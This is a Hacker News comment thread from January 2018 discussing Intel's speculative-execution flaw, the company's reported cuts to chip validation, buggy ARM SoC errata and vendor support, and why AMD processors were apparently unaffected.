This is typically what happens when you go for a long time without real competit...

spdy · on Jan 3, 2018

Isn't why this problem even exits the exact opposite? Intel was losing on the mobile market and changed internal testing to iterate faster by cutting corners.

Found a quote:

"We need to move faster. Validation at Intel is taking much longer than it does for our competition. We need to do whatever we can to reduce those times… we can’t live forever in the shadow of the early 90’s FDIV bug, we need to move on. Our competition is moving much faster than we are".

kabdib · on Jan 3, 2018

Man, you should see the errata for some ARM-based SOCs. It's amazing that they work at all.

Vendor, in conversation: "We're pretty sure we can make the next version do cache coherency correctly."

Me (paraphrased): "Don't let the door hit you in the ass on the way out."

Management chain chooses them anyway, I spend the next year chasing down cache-related bugs. Fun.

djsumdog · on Jan 3, 2018

ARM is such a shitstorm. At least the PC with UEFI is a standard. With every ARM device, you have to have a specialized kernel rom just for that device. There have been efforts made on things like PostmarketOS, but still in general, ARM isn't an architecture. It's random pins soldered to an SoC to make a single use pile of shit.

madez · on Jan 3, 2018

Why is it an issue to need a different kernel image for each device? I don't see a problem as long as there is a simple mechanism to specify your device to generate the right image. It's already like that with coreboot/libreboot/librecore, and it worked just fine for me.

kabdib · on Jan 4, 2018

Imagine that you are the person leading the team that's making an embedded system on an ARM SOC. It's not Linux, so you have your own boot code, drivers and so forth. It's not just a matter of "welp, get another kernel image." You're doing everything from the bare metal on up.

(I should remark that there are good reasons for this effort. Such as: It boots in under 500ms, it's crazy efficient, doesn't use much RAM, and your company won't let you use anything with a GPL license for reasons that the lawyers are adamant about).

So now you get to find all the places where the vendor documentation, sample code and so forth is wrong, or missing entirely, or telling the truth but about a different SOC. You find the race conditions, the timing problems, the magic tuning parameters that make things like the memory controller and the USB system actually work, the places where the cache system doesn't play well with various DMA controllers, the DMA engines that run wild and stomp memory at random, the I2C interfaces that randomly freeze or corrupt data . . . I could go on.

It's fun, but nothing you learn is very transferrable (with the possible exception of mistrust of people at big silicon houses who slap together SOCs).

madez · on Jan 4, 2018

The responsibility to document the quirks and necessary workarounds lie with the manufacturer of the hardware. If the manufacturer doesn't provide the necessary documentation, then that's exactly that: insufficient documentation to use the device.

There are hardware manufacturers that are better than others at being open and providing documentation. My minimal level of required support and documentation right now is mainline linux support.

Can you document your work publicly, or is there something I can read about it? I'm very interested in alternative kernels beside Linux.

kabdib · on Jan 7, 2018

> The responsibility to document the quirks and necessary workarounds lie with the manufacturer of the hardware.

When you buy an SOC, the /contract/ you have with the chip company determines the extent and depth of their responsibility. On the other hand, they do want to sell chips to you, hopefully lots of them, so it's not like they're going to make life difficult.

Some vendors are great at support. They ship you errata without you needing to ask, they are good at fielding questions, they have good quality sample code.

Other vendors will put even large customers on a tier-1 support by default, where your engineers have to deal with crappy filtering and answer inane questions over a period of days before getting any technical engagement. Issues can drag on for months. Sometimes you need to get VPs involved, on both sides, before you can get answers.

The real fun is when you use a vendor that is actively hiding chip bugs and won't admit to issues, even when you have excellent data that exposes them. For bonus points, there are vendors that will rev chips (fixing bugs) without revving chip version identifiers: Half of the chips you have will work, half won't, and you can't tell which are which without putting them into a test setup and running code.

sitkack · on Jan 4, 2018

Arm is a problem for all kernels not just Linux in how they map on chip peripherals, etc. All the problems that UEFI solve, are not solved on Arm.

speleo_engr · on Jan 3, 2018

Yep. I've seen scary errata and had paranoid cache flushes in my code as a precaution.

My favorite ARM experience was where memcpy() was broken in an RTOS for "some cases". "some cases" turned out to be when the size of the copy wasn't a multiple of the cache line size. Scary stuff.

HelloNurse · on Jan 3, 2018

Obvious hypothesis: first complacency leads to incompetence, then starting to cut corners has catastrophic consequences. The two problems are wonderfully complementary.

As other comments suggest, there might be a third stage, completely forgetting how to design and validate chips properly.

eximius · on Jan 3, 2018

Or the system was designed poorly to begin with and now you're stuck with the design for backwards compatibility reasons.

HelloNurse · on Jan 3, 2018

I'd expect engineers that are aware of such serious bugs to spit on the grave of backwards compatibility. After all, the worst case impact would be smaller than the current emergency patches: rewriting small parts of operating systems with a variant for new fixed processors.

mtgx · on Jan 3, 2018

I think that could also have been the "official reason".

The same reason could have been used to give the NSA some legroom for instance, but tell everyone that's why they won't do so much verification in the future.

_0w8t · on Jan 3, 2018

This implies that ARM vendors do less validation. I guess ARM is just so much simpler that good enough validation can be done faster. So essentially this is payback time for Intel for keeping compatibility with older code and simpler to program architecture (stricter cache coherence etc.). It is like one can only have 2 of cheap, reliable, easy-to-program.

pkaye · on Jan 3, 2018

I'm sure ARM vendors have their own problems... it is just that they tend to be used in application specific products so the bugs are worked around. Having come from a firmware background I've worked are tons of ugly workarounds for serious bugs in validated hardware.

Furthermore, I just a read an article (can't find the link) that certain ARM Cortex cores have this same issues as Intel.

lmm · on Jan 4, 2018

> This implies that ARM vendors do less validation. I guess ARM is just so much simpler that good enough validation can be done faster.

More likely "good enough" is much lower because ARM users aren't finding the bugs. The workloads that find these bugs in Intel systems are: heavy compilation, heavy numeric computation, privilege escalation attackers on multi-user systems. Those use cases barely exist on ARM: who's running a compile farm on ARM, or doing scientific computation on an ARM cluster, or offering a public cloud running on ARM?

leoc · on Jan 3, 2018

Where’s that quote from? ISTR reading it (or something very similar) as reported speech in a HN comment.

Overall it’s a depressing story of predictable market failure as well as internal misbehavior at Intel, if true. Few buyers want to pay or wait for correctness until a sufficiently bad bug is sufficiently fresh in human memory. And if you do want to, it’s not as if you’re blessed with many convenient alternatives.

deeth_starr_v · on Jan 3, 2018

The quote is from the link above (referencing an anonymous reddit comment).

mannykannot · on Jan 3, 2018

That is a very interesting perspective, and as far as I know it is correct, though perhaps Intel's situation in the mobile market was exacerbated by complacency?

djsumdog · on Jan 3, 2018

There are people looking to deploy ARM servers now. However I wish there had been more server competition. Many companies write their backend services in Python, JVM (Java/Scala/Groovy), Ruby, etc. Stuff that would run fine on Power, ARM or other architectures. There are very few specialized libraries that really require x86_64 (like ffmpeg and video-transcoding)

astrange · on Jan 4, 2018

ffmpeg works great on ARM. I don't know if the PPC port is all that optimized lately.

innagadadavida · on Jan 3, 2018

But why do AMD chips not have similar issues? To me it looks like Intel tried to micro optimize something and screwed up.

rayiner · on Jan 3, 2018

According to LKML: https://lkml.org/lkml/2017/12/27/2

> The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault.

Out-of-order processors generally trigger exceptions when instructions are retired. Because instructions are retired in-order, that allows exceptions and interrupts to be reported in program order, which is what the programmer expects to happen. Furthermore, because memory access is a critical path, the TLB/privilege check is generally started in parallel with the cache/memory access. In such an architecture, it seems like the straightforward thing to do is to let the improper access to kernel memory execute, and then raise the page fault only when the instruction retires.

leoc · on Jan 3, 2018

Maybe the answer lies in Intel’s feted IPC advantage over AMD? Or is it the case that AMD has simply been relatively lucky so far?